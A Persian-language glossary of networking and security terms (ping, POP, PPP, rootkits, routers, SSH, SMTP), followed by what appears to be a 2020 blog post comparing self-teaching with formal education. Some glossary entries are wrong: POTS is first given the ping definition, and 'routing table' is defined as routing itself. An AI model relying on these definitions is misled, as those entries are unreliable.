ping ابزاری برای تعیین اینکه آیا یک آدرس IP خاص در دسترس است. این کار با ارسال بسته ای به آدرس مشخص شده و منتظر پاسخ است.Plain Old Telephone Service -POTS ابزاری برای تعیین اینکه آیا یک آدرس IP خاص در دسترس است. این کار با ارسال بسته ای به آدرس مشخص شده و منتظر پاسخ است.POP پروتکل اداره پست ، پروتکل مورد استفاده برای بازیابی نامه الکترونیکی از سرور پست الکترونیکی است. اکثر برنامه های نامه الکترونیکی (که گاهی اوقات سرویس گیرنده پست الکترونیکی نامیده می شوند) از پروتکل POP استفاده می کنند ، اگرچه برخی از آنها می توانند از IMAP جدیدتر (پروتکل دسترسی به پیام پیام اینترنتی) استفاده کنند.ports واسط رایانه ای که می توانید وسیله ای را به آن وصل کنید. رایانه های شخصی انواع مختلفی از پورت ها دارند. از نظر داخلی ، چندین درگاه برای اتصال صفحه نمایشهای درایو دیسک و صفحه کلید وجود دارد. از نظر خارجی ، رایانه های شخصی دارای پورت هایی برای اتصال مودم ، پرینتر ، موش و سایر دستگاه های جانبی هستند.POTS Plain old telephone service.سرویس تلفنی قدیمی.ppp پروتکل نقطه به نقطه ، روشی برای اتصال یک کامپیوتر به اینترنت است. PPP نسبت به پروتکل قدیمی SLIP با ثبات تر است و ویژگی های بررسی خطا را ارائه می دهد.privileged access یک امتیاز برای استفاده از اطلاعات رایانه ای به نوعی. به عنوان مثال ، به کاربر امکان دسترسی به یک پرونده داده می شود ، به این معنی که کاربر می تواند پرونده را بخواند اما نمی تواند آن را تغییر یا حذف کند. اکثر سیستم عامل ها دارای چندین نوع دسترسی دسترسی مختلف هستند که می توانند به کاربران خاص یا گروههای کاربر اعطا یا رد شوند.protocol یک فرمت توافق شده برای انتقال داده ها بین دو دستگاه.RAM -Random Access Memoryنوعی از حافظه رایانه ای که به طور تصادفی قابل دستیابی است. یعنی بدون دسترسی به بایت های قبلی ، به هر بایت حافظه قابل دسترسی است.rootkits بدافزارهایی که روشی را برای حفظ دسترسی به دستگاه ایجاد می کند.router دستگاهی که بسته های داده را در امتداد شبکه ها هدایت می کند. یک روتر حداقل به دو شبکه متصل است ، معمولاً به دو LAN یا WAN یا یک LAN و شبکه ISP آن. روترها در دروازه ها ، مکانهایی که دو یا چند شبکه به هم وصل می شوند قرار دارند. روترها از هدر و جداول حمل و نقل برای تعیین بهترین مسیر برای ارسال بسته ها استفاده می کنند و از پروتکل هایی مانند ICMP برای ارتباط با یکدیگر و پیکربندی بهترین مسیر بین هر دو میزبان استفاده می کنند.routing table در کار اینترنت ، فرآیند انتقال یک بسته از داده ها از مبدا به مقصد دیگر. مسیریابی معمولاً توسط یک دستگاه اختصاصی به نام روتر انجام می شود.sandbox یک اقدام امنیتی در محیط توسعه جاوا. جعبه ماسهبازی مجموعه ای از قوانینی است که هنگام ایجاد اپلت به کار می رود و در هنگام ارسال اپلت به عنوان بخشی از یک صفحه وب ، از عملکردهای خاص جلوگیری می کند.script kiddie شخصی که ابزار هک کردن را اجرا می کند بدون اینکه چگونه یا چرا کار می کند.sectors کوچکترین واحد قابل دسترسی به دیسک.Secure Shell پروتکل طراحی شده به عنوان جایگزینی امن تر برای telnet.Server برنامه ای در رایانه از راه دور که برای تهیه داده به یک رایانه محلی استفاده می شود ، مراجعه کنید به مشتری.Services خدمات شبکه به رایانه های محلی اجازه می دهد تا اطلاعات را با رایانه های از راه دور تبادل کنند.SMTP پروتکل انتقال ایمیل ساده ، پروتکل ارسال پیام های ایمیل بین سرورها. بیشتر سیستم های ایمیل که از طریق اینترنت نامه ارسال می کنند از SMTP استفاده می کنند

معلم خود باشیم یا معلمان باشند ؟

localho3t — Wed, 25 Mar 2020 22:59:19 +0430

برای خود اموزی راه های زیادی هست ، مثلا تمرین و تلاش ، خواندن کتاب های مورد علاقه و کلی راه های دیگه.اما مسئله پیش رو اینه که آیا من میتوانم معلم خودم باشم یا نه؟جوابش راحته همه ما به یک شیوه ای معلم خودمون هستیم بعضی هامون تو برنامه نویسی یا تو الگو های زندگی ؛ همین که ما خودمون رو وادار میکنیم تا از یه سری قوانینی تبعیت کنیم یا چطوری بخوابیم و بلند بشیم و چطوری رفتار کنیم ، معلم خودمون هستیم .یکم ساده بود اما یه سری آفَت ها هم داره این کار البته تو بخش فضای غیر فردیه ، مثلا از دید یک ویروس نویس یا یک برنامه نویس و غیره :اول که ادم بعضی وقتا خود بین میشهدوم تنبلی شدیدی به سراغ آدم میادسوم اگه آموزش هایی که داریم می بینیم غلط باشه باید این مسیر رو از اول طی کردچهارم ریسک روی از بین رفتن فرصت هاو اما فواید:اول استقلال فردی و اعتماد به نفس بیشتردوم هزینه کمترسوم زمان کمتری یرای اموزش استفاده میشودچهارم هم زمان با این که یاد می‌گیرید پول به دست آوریدپنجم ربط بیشترششم افزایش بهره وری هفتم افزایش رضایت مندی شغلیسازمانی با دانش روزو اما اگه بزاریم معلممون بشن:فواید:اول مدرک رسمیدوم یادگیری سازمان دهی شدهسوم دانش پایه‌ای قویچهارم راهنمایی بهترپنجم کمک به کاریابی[*] انتخاب با خودتون :)مضرات:اول نداشتن علم از صحت اطلاعات و وفاید آندوم مطابقت نداشتن با متد های روز در دنیاسوم کسل کننده و بدون تکرار بودن آناما من از چه روشی استفاده میکنم؟خب به دلایل وضعیت مالی و خانوادگی مثلما از روش اول استفاده میکنم ، که همون خود آموزی هست و به این کار هم افتخار میکنم اما از اونجایی که کشور ما یه کشور مدرک گرا هست همیشه بهترین ها برای کسایی هست که مدرک دارن این افتخار فقط شخصیه و نمیتونم اون رو اجتماعی کنم ؛ در کل مهم نیست من با قدرت به کارم ادامه میدم شما چطور؟منابع https://rasekhoon.net/ https://vestasoftware.com/fa/journal-elearning/elearning/8-advantages-for-using-virtual-education http://facultymembers.sbu.ac.ir/fathabadi/index.php/students-article/226-1392-02-03-16-39-53.html